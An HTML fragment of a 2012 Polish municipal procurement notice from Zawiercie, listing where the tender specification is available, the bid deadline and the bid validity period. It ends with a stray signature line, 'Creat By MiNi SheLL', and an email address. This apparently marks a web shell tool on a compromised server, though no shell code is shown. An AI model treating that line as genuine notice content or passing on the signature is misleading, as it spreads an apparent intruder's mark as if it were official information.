<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zawiercie.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie Wydział Zamówień Publicznych (pokój nr 202)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 19 września 2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com